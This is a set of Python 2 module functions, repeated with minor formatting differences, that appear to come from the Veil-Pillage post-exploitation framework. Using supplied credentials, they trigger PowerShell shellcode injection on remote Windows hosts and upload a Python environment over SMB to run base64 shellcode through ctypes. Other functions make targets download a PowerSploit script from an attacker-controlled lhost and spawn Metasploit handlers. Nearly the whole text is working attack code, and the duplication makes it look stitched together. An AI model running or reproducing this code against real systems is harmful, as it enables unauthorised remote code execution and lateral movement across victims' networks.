def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] spawnHandler = self.required_options["spawn_handler"][0] # create our powershell payload p = virtual.Payload() # pull out any msfpayload payloads/options if self.args.msfpayload: p.shellcode.SetPayload( [self.args.msfpayload, self.args.msfoptions]) # set custom shellcode if specified elif self.args.custshell: p.shellcode.setCustomShellcode(self.args.custshell) # get the powershell command powershellCommand = p.generate() # re-print the title and module name after shellcode generation (Veil-Evasion trashes this) messages.title() sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...") # if we're using Veil-Evasion's generated handler script, try to spawn it if spawnHandler.lower() == "true": # turn the payload shellcode object into a handler script handlerPath = helpers.shellcodeToHandler(p.shellcode) # make sure a handler was returned if handlerPath != "": # command to spawn a new tab cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\"" # invoke msfconsole with the handler script in a new tab os.system(cmd) raw_input("\n\n [>] Press enter when handler is ready: ") for target in self.targets: print helpers.color(" [*] Triggering powershell command on " + target) # execute the powershell command on each host command_methods.executeCommand(target, username, password, powershellCommand, triggerMethod) self.output += "[*] Powershell inject command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n" # build our cleanup file -> kill all powershell processes killCMD = "taskkill /f /im powershell.exe" self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] spawnHandler = self.required_options["spawn_handler"][0] # create our powershell payload p = virtual.Payload() # pull out any msfpayload payloads/options if self.args.msfpayload: p.shellcode.SetPayload([self.args.msfpayload, self.args.msfoptions]) # set custom shellcode if specified elif self.args.custshell: p.shellcode.setCustomShellcode(self.args.custshell) # get the powershell command powershellCommand = p.generate() # re-print the title and module name after shellcode generation (Veil-Evasion trashes this) messages.title() sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...") # if we're using Veil-Evasion's generated handler script, try to spawn it if spawnHandler.lower() == "true": # turn the payload shellcode object into a handler script handlerPath = helpers.shellcodeToHandler(p.shellcode) # make sure a handler was returned if handlerPath != "": # command to spawn a new tab cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\"" # invoke msfconsole with the handler script in a new tab os.system(cmd) raw_input("\n\n [>] Press enter when handler is ready: ") for target in self.targets: print helpers.color(" [*] Triggering powershell command on "+target) # execute the powershell command on each host command_methods.executeCommand(target, username, password, powershellCommand, triggerMethod) self.output += "[*] Powershell inject command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n" # build our cleanup file -> kill all powershell processes killCMD = "taskkill /f /im powershell.exe" self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"
def run(self): handlerPath = "none" # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] spawnHandler = self.required_options["spawn_handler"][0] # nab up some shellcode from Veil-Evasion sc = shellcode.Shellcode() # set the payload to use, if specified if self.args.msfpayload: sc.SetPayload([self.args.msfpayload, self.args.msfoptions]) # set custom shellcode if specified elif self.args.custshell: sc.setCustomShellcode(self.args.custshell) # base64 our shellcode b64sc = base64.b64encode(sc.generate().decode("string_escape")) # re-print the title and module name after shellcode generation (Veil-Evasion trashes this) messages.title() sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...") # if we're using Veil-Evasion's generated handler script, try to spawn it if spawnHandler.lower() == "true": # turn our shellcode object into a handler script handlerPath = helpers.shellcodeToHandler(sc) # make sure a handler was returned if handlerPath != "": # command to spawn a new tab cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\"" # invoke msfconsole with the handler script in a new tab os.system(cmd) raw_input("\n\n [>] Press enter when handler is ready: ") # otherwise, if we have a custom handler path, try to invoke that elif handlerPath.lower() != "none": if os.path.isdir(handlerPath): # command to spawn a new tab cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\"" # invoke msfconsole with the handler script in a new tab os.system(cmd) raw_input("\n [>] Press enter when handler is ready: ") else: print helpers.color(" [!] Warning: handlerPath '" + handlerPath + "' not valid!") else: pass # command to unzip the uploaded python installation unzipCommand = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip" # path to the 7zip binary zipPath = settings.VEIL_PILLAGE_PATH + "/data/environments/7za.exe" # command to invoke shellcode using python pythonCMD = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" % ( b64sc) # path to the minial python isntall pythonPath = settings.VEIL_PILLAGE_PATH + "/data/environments/python.zip" for target in self.targets: # upload the 7zip.exe binary and the python install uploadResult = smb.uploadFiles(target, username, password, "C$", "\\Windows\\Temp\\", [zipPath, pythonPath]) if uploadResult == "success": self.output += "[*] 7za.exe and python.zip successfully uploaded using creds '" + username + ":" + password + "' on " + target + "\n" print helpers.color(" [*] Triggering 7zip unzip command on " + target) command_methods.executeCommand(target, username, password, unzipCommand, triggerMethod) self.output += "[*] 7za unzip command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n" print helpers.color(" [*] Triggering 'python -c' command on " + target) command_methods.executeCommand(target, username, password, pythonCMD, triggerMethod) self.output += "[*] 'python -c' inject command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n" # build our cleanup file -> kill all python processes and delete the environments killCMD = "taskkill /f /im python.exe" self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n" # command to delete the python extracted directory, zipped python environment and 7za.exe binary delCMD = "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe" self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + delCMD + "|" + triggerMethod + "\n" else: self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded using creds '" + username + ":" + password + "' on " + target + "\n" print helpers.color( "[!] 7za.exe and python.zip unsuccessfully uploaded to " + target + "\n", warning=True)
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] spawnHandler = self.required_options["spawn_handler"][0] use_ssl = self.required_options["use_ssl"][0] lhost = self.required_options["lhost"][0] # nab up some shellcode from Veil-Evasion # users can set custom shellcode there sc = shellcode.Shellcode() # set the payload to use, if specified if self.args.msfpayload: sc.SetPayload([self.args.msfpayload, self.args.msfoptions]) # set custom shellcode if specified elif self.args.custshell: sc.setCustomShellcode(self.args.custshell) # generate our shellcode and get it into the correct format sc_raw = sc.generate() sc_transformed = ",0".join(sc_raw.split("\\"))[1:] # re-print the title and module name after shellcode generation (Veil-Evasion trashes this) messages.title() sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...") # if we're using Veil-Evasion's generated handler script, try to spawn it if spawnHandler.lower() == "true": # turn our shellcode object into a handler script handlerPath = helpers.shellcodeToHandler(sc) # make sure a handler was returned if handlerPath != "": # command to spawn a new tab cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\"" # invoke msfconsole with the handler script in a new tab os.system(cmd) raw_input("\n\n [>] Press enter when handler is ready: ") # path to the PowerSploit Invoke-ShellcodeMSIL.ps1 powershell script secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/PowerSploit/Invoke-ShellcodeMSIL.ps1" # command to invoke the appropriate shellcode in the script scriptArguments = "Invoke-ShellcodeMSIL -Shellcode @(%s)" % ( sc_transformed) # trigger the powershell download on all targets delivery_methods.powershellHostTrigger(self.targets, username, password, secondStagePath, lhost, scriptArguments, triggerMethod, ssl=use_ssl) for target in self.targets: self.output += "[*] Powersploit:Invoke-ShellcodeMSIL triggered using creds '" + username + ":" + password + "' on " + target + " using " + triggerMethod + "\n" # build our cleanup file -> kill all powershell processes killCMD = "taskkill /f /im powershell.exe" self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
def run(self): handlerPath = "none" # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] spawnHandler = self.required_options["spawn_handler"][0] # nab up some shellcode from Veil-Evasion sc = shellcode.Shellcode() # set the payload to use, if specified if self.args.msfpayload: sc.SetPayload([self.args.msfpayload, self.args.msfoptions]) # set custom shellcode if specified elif self.args.custshell: sc.setCustomShellcode(self.args.custshell) # base64 our shellcode b64sc = base64.b64encode(sc.generate().decode("string_escape")) # re-print the title and module name after shellcode generation (Veil-Evasion trashes this) messages.title() sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...") # if we're using Veil-Evasion's generated handler script, try to spawn it if spawnHandler.lower() == "true": # turn our shellcode object into a handler script handlerPath = helpers.shellcodeToHandler(sc) # make sure a handler was returned if handlerPath != "": # command to spawn a new tab cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\"" # invoke msfconsole with the handler script in a new tab os.system(cmd) raw_input("\n\n [>] Press enter when handler is ready: ") # otherwise, if we have a custom handler path, try to invoke that elif handlerPath.lower() != "none": if os.path.isdir(handlerPath): # command to spawn a new tab cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\"" # invoke msfconsole with the handler script in a new tab os.system(cmd) raw_input("\n [>] Press enter when handler is ready: ") else: print helpers.color(" [!] Warning: handlerPath '"+handlerPath+"' not valid!") else: pass # command to unzip the uploaded python installation unzipCommand = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip" # path to the 7zip binary zipPath = settings.VEIL_PILLAGE_PATH+"/data/environments/7za.exe" # command to invoke shellcode using python pythonCMD = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" %(b64sc) # path to the minial python isntall pythonPath = settings.VEIL_PILLAGE_PATH+"/data/environments/python.zip" for target in self.targets: # upload the 7zip.exe binary and the python install uploadResult = smb.uploadFiles(target, username, password, "C$", "\\Windows\\Temp\\", [zipPath, pythonPath]) if uploadResult == "success": self.output += "[*] 7za.exe and python.zip successfully uploaded using creds '"+username+":"+password+"' on "+target+"\n" print helpers.color(" [*] Triggering 7zip unzip command on " + target) command_methods.executeCommand(target, username, password, unzipCommand, triggerMethod) self.output += "[*] 7za unzip command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n" print helpers.color(" [*] Triggering 'python -c' command on " + target) command_methods.executeCommand(target, username, password, pythonCMD, triggerMethod) self.output += "[*] 'python -c' inject command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n" # build our cleanup file -> kill all python processes and delete the environments killCMD = "taskkill /f /im python.exe" self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n" # command to delete the python extracted directory, zipped python environment and 7za.exe binary delCMD = "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe" self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+delCMD+"|"+triggerMethod+"\n" else: self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded using creds '"+username+":"+password+"' on "+target+"\n" print helpers.color("[!] 7za.exe and python.zip unsuccessfully uploaded to "+target+"\n", warning=True)
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] spawnHandler = self.required_options["spawn_handler"][0] use_ssl = self.required_options["use_ssl"][0] lhost = self.required_options["lhost"][0] # nab up some shellcode from Veil-Evasion # users can set custom shellcode there sc = shellcode.Shellcode() # set the payload to use, if specified if self.args.msfpayload: sc.SetPayload([self.args.msfpayload, self.args.msfoptions]) # set custom shellcode if specified elif self.args.custshell: sc.setCustomShellcode(self.args.custshell) # generate our shellcode and get it into the correct format sc_raw = sc.generate() sc_transformed = ",0".join(sc_raw.split("\\"))[1:] # re-print the title and module name after shellcode generation (Veil-Evasion trashes this) messages.title() sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...") # if we're using Veil-Evasion's generated handler script, try to spawn it if spawnHandler.lower() == "true": # turn our shellcode object into a handler script handlerPath = helpers.shellcodeToHandler(sc) # make sure a handler was returned if handlerPath != "": # command to spawn a new tab cmd = ( "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\"" ) # invoke msfconsole with the handler script in a new tab os.system(cmd) raw_input("\n\n [>] Press enter when handler is ready: ") # path to the PowerSploit Invoke-ShellcodeMSIL.ps1 powershell script secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/PowerSploit/Invoke-ShellcodeMSIL.ps1" # command to invoke the appropriate shellcode in the script scriptArguments = "Invoke-ShellcodeMSIL -Shellcode @(%s)" % (sc_transformed) # trigger the powershell download on all targets delivery_methods.powershellHostTrigger( self.targets, username, password, secondStagePath, lhost, scriptArguments, triggerMethod, ssl=use_ssl ) for target in self.targets: self.output += ( "[*] Powersploit:Invoke-ShellcodeMSIL triggered using creds '" + username + ":" + password + "' on " + target + " using " + triggerMethod + "\n" ) # build our cleanup file -> kill all powershell processes killCMD = "taskkill /f /im powershell.exe" self.cleanup += ( "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n" )